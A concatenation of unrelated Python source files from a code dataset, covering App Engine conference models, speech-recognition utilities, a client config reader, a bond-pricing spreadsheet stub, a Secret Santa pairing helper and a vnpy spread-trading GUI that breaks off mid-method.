version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait:
description: Subscribe to any local section of IWA-AIT, workers have common interest
arguments:
- not a list
''')
try:
path = yaml_loader.find_path_by_name('makefile.yml', '/')
self.assertTrue(len(path) > 0)
finally:
d.cleanup()
os.environ['RKD_PATH'] = ''
def test_find_path_by_name_does_not_found_anything(self):
"""Verify that find_path_by_name() will not return anything if nothing searched was found"""
yaml_loader = YamlFileLoader([])
self.assertEqual('', yaml_loader.find_path_by_name('some-file-that-does-not-exists', ''))
|
the-stack_0_19867 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""models.py
Udacity conference server-side Python App Engine data & ProtoRPC models
$Id: models.py,v 1.1 2014/05/24 22:01:10 wesc Exp $
created/forked from conferences.py by wesc on 2014 may 24
"""
__author__ = '[email protected] (Wesley Chun)'
import httplib
import endpoints
from protorpc import messages
from google.appengine.ext import ndb
class ConflictException(endpoints.ServiceException):
"""ConflictException -- exception mapped to HTTP 409 response"""
http_status = httplib.CONFLICT
class Profile(ndb.Model):
"""Profile -- User profile object"""
displayName = ndb.StringProperty()
mainEmail = ndb.StringProperty()
teeShirtSize = ndb.StringProperty(default='NOT_SPECIFIED')
conferenceKeysToAttend = ndb.StringProperty(repeated=True)
sessionKeysInWishlist = ndb.StringProperty(repeated=True)
class ProfileMiniForm(messages.Message):
"""ProfileMiniForm -- update Profile form message"""
displayName = messages.StringField(1)
teeShirtSize = messages.EnumField('TeeShirtSize', 2)
class ProfileForm(messages.Message):
"""ProfileForm -- Profile outbound form message"""
displayName = messages.StringField(1)
mainEmail = messages.StringField(2)
teeShirtSize = messages.EnumField('TeeShirtSize', 3)
conferenceKeysToAttend = messages.StringField(4, repeated=True)
sessionKeysInWishlist = messages.StringField(5, repeated=True)
class StringMessage(messages.Message):
"""StringMessage-- outbound (single) string message"""
data = messages.StringField(1, required=True)
class BooleanMessage(messages.Message):
"""BooleanMessage-- outbound Boolean value message"""
data = messages.BooleanField(1)
class Conference(ndb.Model):
"""Conference -- Conference object"""
name = ndb.StringProperty(required=True)
description = ndb.StringProperty()
organizerUserId = ndb.StringProperty()
topics = ndb.StringProperty(repeated=True)
city = ndb.StringProperty()
startDate = ndb.DateProperty()
month = ndb.IntegerProperty() # TODO: do we need for indexing like Java?
endDate = ndb.DateProperty()
maxAttendees = ndb.IntegerProperty()
seatsAvailable = ndb.IntegerProperty()
class ConferenceForm(messages.Message):
"""ConferenceForm -- Conference outbound form message"""
name = messages.StringField(1)
description = messages.StringField(2)
organizerUserId = messages.StringField(3)
topics = messages.StringField(4, repeated=True)
city = messages.StringField(5)
startDate = messages.StringField(6) # DateTimeField()
month = messages.IntegerField(7)
maxAttendees = messages.IntegerField(8)
seatsAvailable = messages.IntegerField(9)
endDate = messages.StringField(10) # DateTimeField()
websafeKey = messages.StringField(11)
organizerDisplayName = messages.StringField(12)
class ConferenceForms(messages.Message):
"""ConferenceForms -- multiple Conference outbound form message"""
items = messages.MessageField(ConferenceForm, 1, repeated=True)
class Session(ndb.Model):
name = ndb.StringProperty(required=True)
highlights = ndb.StringProperty()
speaker = ndb.StringProperty(required=True)
duration = ndb.IntegerProperty()
typeOfSession = ndb.StringProperty(repeated=True)
date = ndb.DateProperty()
start_time = ndb.TimeProperty()
wish_list_count = ndb.IntegerProperty()
class SessionForm(messages.Message):
name = messages.StringField(1)
highlights = messages.StringField(2)
speaker = messages.StringField(3)
duration = messages.IntegerField(4)
typeOfSession = messages.StringField(5, repeated=True)
date = messages.StringField(6)
start_time = messages.StringField(7)
websafeConferenceKey = messages.StringField(8)
websafeKey = messages.StringField(9)
class SessionForms(messages.Message):
"""SessionForms -- multiple Session outbound form message"""
items = messages.MessageField(SessionForm, 1, repeated=True)
class FeaturedSpeakerForm(messages.Message):
speaker = messages.StringField(1)
name = messages.StringField(2, repeated=True)
class FeaturedSpeakerForms(messages.Message):
"""FeaturedSpeakerForm -- multiple Session outbound form message"""
items = messages.MessageField(FeaturedSpeakerForm, 1, repeated=True)
class TeeShirtSize(messages.Enum):
"""TeeShirtSize -- t-shirt size enumeration value"""
NOT_SPECIFIED = 1
XS_M = 2
XS_W = 3
S_M = 4
S_W = 5
M_M = 6
M_W = 7
L_M = 8
L_W = 9
XL_M = 10
XL_W = 11
XXL_M = 12
XXL_W = 13
XXXL_M = 14
XXXL_W = 15
class ConferenceQueryForm(messages.Message):
"""ConferenceQueryForm -- Conference query inbound form message"""
field = messages.StringField(1)
operator = messages.StringField(2)
value = messages.StringField(3)
class ConferenceQueryForms(messages.Message):
"""ConferenceQueryForms -- multiple ConferenceQueryForm inbound form message"""
filters = messages.MessageField(ConferenceQueryForm, 1,
repeated=True)
|
the-stack_0_19868 | # encoding: utf-8
# ******************************************************
# Author : zzw922cn
# Last modified: 2017-12-09 11:00
# Email : [email protected]
# Filename : utils.py
# Description : Function utils library for Automatic Speech Recognition
# ******************************************************
import time
from functools import wraps
import os
from glob import glob
import numpy as np
import tensorflow as tf
import math
def describe(func):
''' wrap function,to add some descriptions for function and its running time
'''
@wraps(func)
def wrapper(*args, **kwargs):
print(func.__name__+'...')
start = time.time()
result = func(*args, **kwargs)
end = time.time()
print(str(func.__name__+' in '+ str(end-start)+' s'))
return result
return wrapper
def getAttrs(object, name):
''' get attributes for object
'''
assert type(name) == list, 'name must be a list'
value = []
for n in name:
value.append(getattr(object, n, 'None'))
return value
def setAttrs(object, attrsName, attrsValue):
''' register attributes for this class '''
assert type(attrsName) == list, 'attrsName must be a list'
assert type(attrsValue) == list, 'attrsValue must be a list'
for name, value in zip(attrsName, attrsValue):
object.__dict__[name] = value
def output_to_sequence(lmt, type='phn'):
''' convert the output into sequences of characters or phonemes
'''
phn = ['aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ax-h',
'axr', 'ay', 'b', 'bcl', 'ch', 'd', 'dcl',
'dh', 'dx', 'eh', 'el', 'em', 'en', 'eng',
'epi', 'er', 'ey', 'f', 'g', 'gcl', 'h#',
'hh', 'hv', 'ih', 'ix', 'iy', 'jh', 'k',
'kcl', 'l', 'm', 'n', 'ng', 'nx', 'ow',
'oy', 'p', 'pau', 'pcl', 'q', 'r', 's',
'sh', 't', 'tcl', 'th', 'uh', 'uw', 'ux',
'v', 'w', 'y', 'z', 'zh']
sequences = []
start = 0
sequences.append([])
for i in range(len(lmt[0])):
if lmt[0][i][0] == start:
sequences[start].append(lmt[1][i])
else:
start = start + 1
sequences.append([])
#here, we only print the first sequence of batch
indexes = sequences[0] #here, we only print the first sequence of batch
if type == 'phn':
seq = []
for ind in indexes:
if ind == len(phn):
pass
else:
seq.append(phn[ind])
seq = ' '.join(seq)
return seq
elif type == 'cha':
seq = []
for ind in indexes:
if ind == 0:
seq.append(' ')
elif ind == 27:
seq.append("'")
elif ind == 28:
pass
else:
seq.append(chr(ind+96))
seq = ''.join(seq)
return seq
else:
raise TypeError('mode should be phoneme or character')
def target2phoneme(target):
seq = []
for t in target:
if t == len(phn):
pass
else:
seq.append(phn[t])
seq = ' '.join(seq)
return seq
@describe
def logging(model,logfile,errorRate,epoch=0,delta_time=0,mode='train'):
''' log the cost and error rate and time while training or testing
'''
if mode != 'train' and mode != 'test' and mode != 'config' and mode != 'dev':
raise TypeError('mode should be train or test or config.')
logfile = logfile
if mode == 'config':
with open(logfile, "a") as myfile:
myfile.write(str(model.config)+'\n')
elif mode == 'train':
with open(logfile, "a") as myfile:
myfile.write(str(time.strftime('%X %x %Z'))+'\n')
myfile.write("Epoch:"+str(epoch+1)+' '+"train error rate:"+str(errorRate)+'\n')
myfile.write("Epoch:"+str(epoch+1)+' '+"train time:"+str(delta_time)+' s\n')
elif mode == 'test':
logfile = logfile+'_TEST'
with open(logfile, "a") as myfile:
myfile.write(str(model.config)+'\n')
myfile.write(str(time.strftime('%X %x %Z'))+'\n')
myfile.write("test error rate:"+str(errorRate)+'\n')
elif mode == 'dev':
logfile = logfile+'_DEV'
with open(logfile, "a") as myfile:
myfile.write(str(model.config)+'\n')
myfile.write(str(time.strftime('%X %x %Z'))+'\n')
myfile.write("development error rate:"+str(errorRate)+'\n')
@describe
def count_params(model, mode='trainable'):
''' count all parameters of a tensorflow graph
'''
if mode == 'all':
num = np.sum([np.product([xi.value for xi in x.get_shape()]) for x in model.var_op])
elif mode == 'trainable':
num = np.sum([np.product([xi.value for xi in x.get_shape()]) for x in model.var_trainable_op])
else:
raise TypeError('mode should be all or trainable.')
print('number of '+mode+' parameters: '+str(num))
return num
def list_to_sparse_tensor(targetList, level):
''' turn 2-D List to SparseTensor
'''
indices = [] #index
vals = [] #value
assert level == 'phn' or level == 'cha', 'type must be phoneme or character, seq2seq will be supported in future'
phn = ['aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ax-h',\
'axr', 'ay', 'b', 'bcl', 'ch', 'd', 'dcl',\
'dh', 'dx', 'eh', 'el', 'em', 'en', 'eng',\
'epi', 'er', 'ey', 'f', 'g', 'gcl', 'h#',\
'hh', 'hv', 'ih', 'ix', 'iy', 'jh', 'k',\
'kcl', 'l', 'm', 'n', 'ng', 'nx', 'ow',\
'oy', 'p', 'pau', 'pcl', 'q', 'r', 's',\
'sh', 't', 'tcl', 'th', 'uh', 'uw', 'ux',\
'v', 'w', 'y', 'z', 'zh']
mapping = {'ah': 'ax', 'ax-h': 'ax', 'ux': 'uw', 'aa': 'ao', 'ih': 'ix', \
'axr': 'er', 'el': 'l', 'em': 'm', 'en': 'n', 'nx': 'n',\
'eng': 'ng', 'sh': 'zh', 'hv': 'hh', 'bcl': 'h#', 'pcl': 'h#',\
'dcl': 'h#', 'tcl': 'h#', 'gcl': 'h#', 'kcl': 'h#',\
'q': 'h#', 'epi': 'h#', 'pau': 'h#'}
group_phn = ['ae', 'ao', 'aw', 'ax', 'ay', 'b', 'ch', 'd', 'dh', 'dx', 'eh', \
'er', 'ey', 'f', 'g', 'h#', 'hh', 'ix', 'iy', 'jh', 'k', 'l', \
'm', 'n', 'ng', 'ow', 'oy', 'p', 'r', 's', 't', 'th', 'uh', 'uw',\
'v', 'w', 'y', 'z', 'zh']
mapping = {'ah': 'ax', 'ax-h': 'ax', 'ux': 'uw', 'aa': 'ao', 'ih': 'ix', \
'axr': 'er', 'el': 'l', 'em': 'm', 'en': 'n', 'nx': 'n',\
'eng': 'ng', 'sh': 'zh', 'hv': 'hh', 'bcl': 'h#', 'pcl': 'h#',\
'dcl': 'h#', 'tcl': 'h#', 'gcl': 'h#', 'kcl': 'h#',\
'q': 'h#', 'epi': 'h#', 'pau': 'h#'}
group_phn = ['ae', 'ao', 'aw', 'ax', 'ay', 'b', 'ch', 'd', 'dh', 'dx', 'eh', \
'er', 'ey', 'f', 'g', 'h#', 'hh', 'ix', 'iy', 'jh', 'k', 'l', \
'm', 'n', 'ng', 'ow', 'oy', 'p', 'r', 's', 't', 'th', 'uh', 'uw',\
'v', 'w', 'y', 'z', 'zh']
if level == 'cha':
for tI, target in enumerate(targetList):
for seqI, val in enumerate(target):
indices.append([tI, seqI])
vals.append(val)
shape = [len(targetList), np.asarray(indices).max(axis=0)[1]+1] #shape
return (np.array(indices), np.array(vals), np.array(shape))
elif level == 'phn':
'''
for phn level, we should collapse 61 labels into 39 labels before scoring
Reference:
Heterogeneous Acoustic Measurements and Multiple Classifiers for Speech Recognition(1986),
Andrew K. Halberstadt, https://groups.csail.mit.edu/sls/publications/1998/phdthesis-drew.pdf
'''
for tI, target in enumerate(targetList):
for seqI, val in enumerate(target):
if val < len(phn) and (phn[val] in mapping.keys()):
val = group_phn.index(mapping[phn[val]])
indices.append([tI, seqI])
vals.append(val)
shape = [len(targetList), np.asarray(indices).max(0)[1]+1] #shape
return (np.array(indices), np.array(vals), np.array(shape))
else:
##support seq2seq in future here
raise ValueError('Invalid level: %s'%str(level))
def get_edit_distance(hyp_arr, truth_arr, normalize, level):
''' calculate edit distance
This is very universal, both for cha-level and phn-level
'''
graph = tf.Graph()
with graph.as_default():
truth = tf.sparse_placeholder(tf.int32)
hyp = tf.sparse_placeholder(tf.int32)
editDist = tf.reduce_sum(tf.edit_distance(hyp, truth, normalize=normalize))
with tf.Session(graph=graph) as session:
truthTest = list_to_sparse_tensor(truth_arr, level)
hypTest = list_to_sparse_tensor(hyp_arr, level)
feedDict = {truth: truthTest, hyp: hypTest}
dist = session.run(editDist, feed_dict=feedDict)
return dist
def data_lists_to_batches(inputList, targetList, batchSize, level):
''' padding the input list to a same dimension, integrate all data into batchInputs
'''
assert len(inputList) == len(targetList)
# dimensions of inputList:batch*39*time_length
nFeatures = inputList[0].shape[0]
maxLength = 0
for inp in inputList:
# find the max time_length
maxLength = max(maxLength, inp.shape[1])
# randIxs is the shuffled index from range(0,len(inputList))
randIxs = np.random.permutation(len(inputList))
start, end = (0, batchSize)
dataBatches = []
while end <= len(inputList):
# batchSeqLengths store the time-length of each sample in a mini-batch
batchSeqLengths = np.zeros(batchSize)
# randIxs is the shuffled index of input list
for batchI, origI in enumerate(randIxs[start:end]):
batchSeqLengths[batchI] = inputList[origI].shape[-1]
batchInputs = np.zeros((maxLength, batchSize, nFeatures))
batchTargetList = []
for batchI, origI in enumerate(randIxs[start:end]):
# padSecs is the length of padding
padSecs = maxLength - inputList[origI].shape[1]
# numpy.pad pad the inputList[origI] with zeos at the tail
batchInputs[:,batchI,:] = np.pad(inputList[origI].T, ((0,padSecs),(0,0)), 'constant', constant_values=0)
# target label
batchTargetList.append(targetList[origI])
dataBatches.append((batchInputs, list_to_sparse_tensor(batchTargetList, level), batchSeqLengths))
start += batchSize
end += batchSize
return (dataBatches, maxLength)
def load_batched_data(mfccPath, labelPath, batchSize, mode, level):
'''returns 3-element tuple: batched data (list), maxTimeLength (int), and
total number of samples (int)'''
return data_lists_to_batches([np.load(os.path.join(mfccPath, fn)) for fn in os.listdir(mfccPath)],
[np.load(os.path.join(labelPath, fn)) for fn in os.listdir(labelPath)],
batchSize, level) + (len(os.listdir(mfccPath)),)
def list_dirs(mfcc_dir, label_dir):
mfcc_dirs = glob(mfcc_dir)
label_dirs = glob(label_dir)
for mfcc,label in zip(mfcc_dirs,label_dirs):
yield (mfcc,label)
def batch_norm(x, is_training=True):
""" Batch normalization.
"""
with tf.variable_scope('BatchNorm'):
inputs_shape = x.get_shape()
axis = list(range(len(inputs_shape) - 1))
param_shape = inputs_shape[-1:]
beta = tf.get_variable('beta', param_shape, initializer=tf.constant_initializer(0.))
gamma = tf.get_variable('gamma', param_shape, initializer=tf.constant_initializer(1.))
batch_mean, batch_var = tf.nn.moments(x, axis)
ema = tf.train.ExponentialMovingAverage(decay=0.5)
def mean_var_with_update():
ema_apply_op = ema.apply([batch_mean, batch_var])
with tf.control_dependencies([ema_apply_op]):
return tf.identity(batch_mean), tf.identity(batch_var)
mean, var = tf.cond(is_training,
mean_var_with_update,
lambda: (ema.average(batch_mean), ema.average(batch_var)))
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)
return normed
def _get_dims(shape):
"""get shape for initialization
"""
fan_in = shape[0] if len(shape) == 2 else np.prod(shape[:-1])
fan_out = shape[1] if len(shape) == 2 else shape[-1]
return fan_in, fan_out
def dropout(x, keep_prob, is_training):
""" Apply dropout to a tensor
"""
return tf.contrib.layers.dropout(x, keep_prob=keep_prob, is_training=is_training)
|
the-stack_0_19869 | # Copyright (c) 2016 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-IoticAgent/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper object for the Client Configuration file
"""
from __future__ import unicode_literals
from sys import argv
from io import StringIO
import os.path
import logging
logger = logging.getLogger(__name__)
from IoticAgent.Core.compat import PY3
if PY3:
from configparser import ConfigParser # pylint: disable=import-error,wrong-import-order
else:
from ConfigParser import ConfigParser # pylint: disable=import-error,wrong-import-order
class Config(object):
def __init__(self, fn=None, string=None):
"""Config helper reads/writes .ini files.
If a setting is not specified in the .ini file the default from `self.__defaults` will be used. Alternatively
a textual configuration can be specified using the `string` argument. `fn` takes precedence over `string`.
`[agent] =` This section is used for AMQP Login details.
#!python
host = # ip:port of the AMQP broker
vhost = # virtualhost name
prefix = # username (agent id) prefix for login
sslca = # SSL CA file for non-public (dns) broker connections
lang = # The two-character ISO 639-1 language code to use by
# default for your agent. Uses container default
# if not specified
`[iot] =` Settings for the IOT wrapper
sync_request_timeout = # 330 (default). How long synchronous requests at most wait before timing out. This
# option should have a higher value set than core.network_retry_timeout.
`[logging] =` Logging preferences
amqp and rdflib are both set to Warning to prevent verbose/boring output
`[core] =` advanced settings
#!python
network_retry_timeout = # seconds to retry message sending for if no
# connection. 0 to disable.
# IOT functions that make requests without
# internet access will block until success
# or retry_timeout
socket_timeout = # 10 (default) Underlying socket connection/operation timeout
auto_encode_decode = # 1 (default). If a dict is shared it can be
# automatically encoded and decoded.
# Disable with = 0.
queue_size = # 128 (default). Maximum number of (outgoing) requests to allow in pending
# request queue before blocking. Set to zero for unlimited. Whether queue
# fills up depends on latency & throughput of network & container as well as
# throttling setting.
throttle = # Automatic request (outgoing) throttling, specified as comma-separate list of
# REQUESTS/INTERVAL pairs. E.g. '180/60,600/300' would result in no more than 180
# requests being sent over the last 60 seconds and no more than 600 requests over the
# last 5 minutes. Used to prevent rate-limiting containers from temporarily banning
# the client without requiring application code to introduce artificial delays. Note:
# The limits should be set a bit lower than the hard limits imposed by container.
"""
self.__fname = None
self.__config = {}
#
# Defaults if not specified in config file
self.__defaults = {
'agent': {
'vhost': 'container1',
'prefix': ''
},
'iot': {
'sync_request_timeout': 330
},
'core': {
'network_retry_timeout': 300,
'socket_timeout': 10,
'auto_encode_decode': 1,
'queue_size': 128,
'throttle': '480/30,1680/300',
'conn_retry_delay': 5,
'conn_error_log_threshold': 180
},
'logging': {
'amqp': 'warning',
'rdflib': 'warning'
}
}
#
self.__config = {
'iot': {},
'core': {},
'agent': {},
'logging': {}
}
# Sanity, check the config file exists and is valid
self.__fname = fn
if string is not None and fn is None:
conf_stream = StringIO(string)
conf_name = 'string'
else:
self.__fname = self._file_loc()
conf_name = self.__fname
if os.path.exists(self.__fname):
conf_stream = open(self.__fname, 'r')
else:
conf_stream = StringIO()
#
cpa = ConfigParser()
try:
if PY3:
cpa.read_file(conf_stream, source=conf_name) # pylint: disable=no-member
else:
cpa.readfp(conf_stream, conf_name) # pylint: disable=deprecated-method
finally:
conf_stream.close()
for ese in cpa.sections():
for eva in cpa.options(ese):
self.update(ese, eva, cpa.get(ese, eva))
def _file_loc(self):
"""_file_loc helper returns a possible config filename.
EG /tmp/stuff/fish.py -> /tmp/stuff/fish.ini
"""
if self.__fname is None:
f = os.path.splitext(os.path.basename(argv[0]))[0] + '.ini'
cwd = os.getcwd()
# todo: prefer script path or current path ??
# print(os.path.realpath(sys.argv[0]))
# todo: if os.path.exists(os.path.join(cwd, main.__file__)):
return os.path.join(cwd, f)
return self.__fname
def setup_logging(self):
"""Setup logging module based on known modules in the config file
"""
logging.getLogger('amqp').setLevel(str_to_logging(self.get('logging', 'amqp')))
logging.getLogger('rdflib').setLevel(str_to_logging(self.get('logging', 'rdflib')))
def save(self, filename=None):
"""Write config to file."""
if self.__fname is None and filename is None:
raise ValueError('Config loaded from string, no filename specified')
conf = self.__config
cpa = dict_to_cp(conf)
with open(self.__fname if filename is None else filename, 'w') as f:
cpa.write(f)
def get(self, section, val):
"""Get a setting or the default
`Returns` The current value of the setting `val` or the default, or `None` if not found
`section` (string) the section name in the config E.g. `"agent"`
`val` (string) the section name in the config E.g. `"host"`
"""
val = val.lower()
if section in self.__config:
if val in self.__config[section]:
# logger.debug('get config %s %s = %s', section, val, self.__config[section][val])
return self.__config[section][val]
if section in self.__defaults:
if val in self.__defaults[section]:
# logger.debug('get defaults %s %s = %s', section, val, self.__defaults[section][val])
return self.__defaults[section][val]
return None
def set(self, section, val, data):
"""Add a setting to the config
`section` (string) the section name in the config E.g. `"agent"`
`val` (string) the section name in the config E.g. `"host"`
`data` the new value for the `val`
"""
val = val.lower()
if section in self.__config:
# logger.debug('set %s %s = %s', section, val, data)
self.__config[section][val] = data
def update(self, section, val, data):
"""Add a setting to the config, but if same as default or None then no action.
This saves the .save writing the defaults
`section` (string) the section name in the config E.g. `"agent"`
`val` (string) the section name in the config E.g. `"host"`
`data` the new value for the `val`
"""
k = self.get(section, val)
# logger.debug('update %s %s from: %s to: %s', section, val, k, data)
if data is not None and k != data:
self.set(section, val, data)
def dict_to_cp(dic):
ret = ConfigParser()
for esc in dic:
if dic[esc]:
ret.add_section(esc)
for eva in dic[esc]:
ret.set(esc, eva, str(dic[esc][eva]))
return ret
def str_to_logging(level):
level = level.lower()
if level == 'critical':
return logging.CRITICAL
if level == 'error':
return logging.ERROR
if level == 'warning':
return logging.WARNING
if level == 'debug':
return logging.DEBUG
return logging.INFO
|
the-stack_0_19872 | from datetime import date
from openpyxl import load_workbook
if __name__ == '__main__':
wb = load_workbook('FixedCouponBond.xlsx')
ws = wb.active
# Take the input parameters
today = ws['C2'].value.date()
# OIS Data
ois_startdate = today
ois_maturities = []
ois_mktquotes = []
for cell in list(ws.iter_rows('B15:C44')):
ois_maturities.append(cell[0].value)
ois_mktquotes.append(cell[1].value)
# Credit Curve Data
ndps = []
ndpdates = []
for cell in list(ws.iter_rows('B6:C11')):
ndpdates.append(cell[0].value.date())
ndps.append(cell[1].value)
# Bond data
nominals = []
start_dates = []
end_dates = []
cpn_frequency = []
coupons = []
recovery_rates = []
for cell in list(ws.iter_rows('E5:J19')):
nominals.append(cell[0].value)
start_dates.append(cell[1].value.date())
end_dates.append(cell[2].value.date())
cpn_frequency.append(cell[3].value)
coupons.append(cell[4].value)
recovery_rates.append(cell[5].value)
# YOUR CODE HERE ....
# In the coupon calculation use 30e360 convention to compute the accrual period (i.e. tau)
# The result of your code must be a variables of type list named
# output_npv. The length of this list has to be the equal to the number of bonds
# i.e len(nominals) for example
# END OF YOUR CODE
# Write results
# A variable named output_results of type list, with the same length of output_dates, is expected.
# In case this is not present, a message is written
if 'output_npv' not in locals():
output_npv = ["Not Successful" for x in range(len(nominals))]
out_list = list(ws.iter_rows('K5:K19'))
for i in range(len(output_npv)):
out_list[i][0].value = output_npv[i]
# A new file with the results is created
wb.save("FixedCouponBond_output.xlsx") |
the-stack_0_19873 | import random
from secret_santa.models import SantaGame, Participant
def get_santas(id_users):
pars = {}
random.shuffle(id_users)
for index in range(len(id_users) - 1):
pars[id_users[index]] = id_users[index + 1]
pars[id_users[-1]] = id_users[0]
return pars
def get_random_wishlist(tg_id):
participant = Participant.objects.get(tg_id=tg_id)
game = participant.game
participants = Participant.objects.filter(game=game).exclude(tg_id=tg_id)
random_participant = random.choice(participants)
return random_participant.wish_list
|
the-stack_0_19874 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
__name__ = 'mkstuff'
release_info = {}
infopath = os.path.abspath(os.path.join(os.path.dirname(__file__),
__name__, 'info.py'))
with open(infopath) as open_file:
exec(open_file.read(), release_info)
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = __name__,
author = release_info['__author__'],
author_email = release_info['__email__'],
version = release_info['__version__'],
url = release_info['__url__'],
packages = find_packages(),
install_requires = release_info['__requires__'],
license = release_info['__license__'],
description = release_info['__about__'],
#long_description = long_description,
long_description = release_info['__about__'],
long_description_content_type = 'text/rst',
setup_requires = release_info['__setup_requires__'],
tests_require = release_info['__tests_require__'],
#platforms = ['posix', 'mac os'],
#classifiers= [
#'Programming Language :: Python',
#'Natural Language :: English',
#],
#scripts = ['bin/{}'.format(fn) for fn in ['fits2ascii.py', 'ascii2fits.py']],
)
|
the-stack_0_19879 | # encoding: UTF-8
'''
套利交易模块相关的GUI控制组件
'''
from vnpy.trader.vtConstant import DIRECTION_LONG, DIRECTION_SHORT
from vnpy.trader.uiBasicWidget import QtWidgets, QtGui, QtCore
from vnpy.trader.vtEvent import *
from vnpy.trader.app.ctaStrategy.ctaGridTrade import *
########################################################################
class SplitLine(QtWidgets.QFrame):
"""水平分割线"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(SplitLine, self).__init__()
self.setFrameShape(self.HLine)
self.setFrameShadow(self.Sunken)
class SpreadTradeManager(QtWidgets.QWidget):
# ----------------------------------------------------------------------
def __init__(self, ctaEngine, eventEngine, parent=None):
super(SpreadTradeManager, self).__init__(parent)
self.ctaEngine = ctaEngine
self.eventEngine = eventEngine
self.strategy_name_list = []
self.strategy = None
self.directionList = [DIRECTION_LONG, DIRECTION_SHORT]
self.initUi()
# ----------------------------------------------------------------------
def initUi(self):
"""初始化界面"""
self.setWindowTitle(u'套利交易')
# 连接运行中的套利测试(策略名称[下拉菜单],连接按钮)
self.btnSwitchConnectStatus = QtWidgets.QPushButton(u'套利策略未连接')
self.btnSwitchConnectStatus.clicked.connect(self.btnSwitchClick)
Label = QtWidgets.QLabel
grid = QtWidgets.QGridLayout()
grid.addWidget(Label(u'状态'), 0, 0)
grid.addWidget(self.btnSwitchConnectStatus, 0, 1)
self.spreadStraty = QtWidgets.QComboBox()
self.strategy_name_list = self.ctaEngine.strategyDict.keys()
self.spreadStraty.addItems(self.strategy_name_list)
grid.addWidget(Label(u'套利策略'), 1, 0)
grid.addWidget(self.spreadStraty, 1, 1)
# 网格信息+操作(新增,删除,更新)
grid.addWidget(Label(u'方向'), 2, 0)
self.gridDirection = QtWidgets.QComboBox()
self.gridDirection.addItems(self.directionList)
grid.addWidget(self.gridDirection, 2, 1)
self.spinOpenPrice = QtWidgets.QDoubleSpinBox()
self.spinOpenPrice.setDecimals(4)
self.spinOpenPrice.setMinimum(-10000) # 原来是0,为支持套利,改为-10000
self.spinOpenPrice.setMaximum(100000)
self.spinOpenPrice.valueChanged.connect(self.spinOpenPrice_valueChanged)
grid.addWidget(Label(u'开仓价'), 3, 0)
grid.addWidget(self.spinOpenPrice, 3, 1)
self.spinClosePrice = QtWidgets.QDoubleSpinBox()
self.spinClosePrice.setDecimals(4)
self.spinClosePrice.setMinimum(-10000) # 原来是0,为支持套利,改为-10000
self.spinClosePrice.setMaximum(100000)
grid.addWidget(Label(u'平仓价'), 4, 0)
grid.addWidget(self.spinClosePrice, 4, 1)
self.spinOrderVolume = QtWidgets.QSpinBox()
self.spinOrderVolume.setMinimum(0)
self.spinOrderVolume.setMaximum(1000)
grid.addWidget(Label(u'委托数量'), 5, 0)
grid.addWidget(self.spinOrderVolume, 5, 1)
self.spinTradedVolume = QtWidgets.QSpinBox()
self.spinTradedVolume.setMinimum(0)
self.spinTradedVolume.setMaximum(1000)
grid.addWidget(Label(u'成交数量'), 6, 0)
grid.addWidget(self.spinTradedVolume, 6, 1)
self.openStatus = QtWidgets.QCheckBox(u'') # 开仓状态
grid.addWidget(Label(u'开仓状态'), 7, 0)
grid.addWidget(self.openStatus, 7, 1)
self.orderStatus = QtWidgets.QCheckBox(u'') # 委托状态
grid.addWidget(Label(u'委托状态'), 8, 0)
grid.addWidget(self.orderStatus, 8, 1)
self.closeStatus = QtWidgets.QCheckBox(u'') # 平仓状态
grid.addWidget(Label(u'平仓状态'), 9, 0)
grid.addWidget(self.closeStatus, 9, 1)
self.reuseStatus = QtWidgets.QCheckBox(u'') # 平仓状态
grid.addWidget(Label(u'重用网格'), 10, 0)
grid.addWidget(self.reuseStatus, 10, 1)
btnAddGrid = QtWidgets.QPushButton(u'增加')
btnAddGrid.clicked.connect(self.btnAddGridClick)
btnUpdateGrid = QtWidgets.QPushButton(u'更新')
btnUpdateGrid.clicked.connect(self.btnUpdateGridClick)
btnRemoveGrid = QtWidgets.QPushButton(u'删除')
btnRemoveGrid.clicked.connect(self.btnRemoveGridClick)
btnRemoveAll = QtWidgets.QPushButton(u'全删除')
btnRemoveAll.clicked.connect(self.btnRemoveAllClick)
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(btnAddGrid)
hbox.addWidget(btnUpdateGrid)
hbox.addStretch()
hbox.addWidget(btnRemoveGrid)
hbox.addWidget(btnRemoveAll)
vbox = QtWidgets.QVBoxLayout()
vbox.addLayout(grid)
vbox.addLayout(hbox)
# 状态信息(通过定时器,显示 上网格清单,下网格清单)
#日志监控
self.logMsgs = QtWidgets.QTextEdit()
self.logMsgs.setReadOnly(True)
self.logMsgs.setMaximumHeight(200)
vbox.addWidget(self.logMsgs)
self.setLayout(vbox)
def btnSwitchClick(self):
"""策略连接按钮"""
if self.ctaEngine is None:
self.log(u'没有连接CTA引擎')
return
strategy_name = self.spreadStraty.currentText()
if strategy_name is None or len(strategy_name) == 0:
if len(self.strategy_name_list)==0:
self.strategy_name_list = self.ctaEngine.strategyDict.keys()
self.spreadStraty.addItems(self.strategy_name_list)
return
self.strategy = self.ctaEngine.strategyDict[strategy_name]
if self.strategy.trading:
self.btnSwitchConnectStatus.setText(u'连接成功、启动')
self.log(u'连接{0}成功、启动'.format(strategy_name))
else:
self.btnSwitchConnectStatus.setText(u'连接成功,未启动')
self.log(u'连接{0}成功,但策略未启动'.format(strategy_name))
self.displayGrids()
def btnAddGridClick(self):
"""网格新增按钮"""
if self.ctaEngine is None:
self.log(u'没有连接CTA引擎')
return
if self.strategy is None:
self.log(u'没有连接策略')
return
direction = self.gridDirection.currentText()
if direction is None or len(direction) ==0:
self.log(u'先选择方向')
return
open_price = self.spinOpenPrice.value()
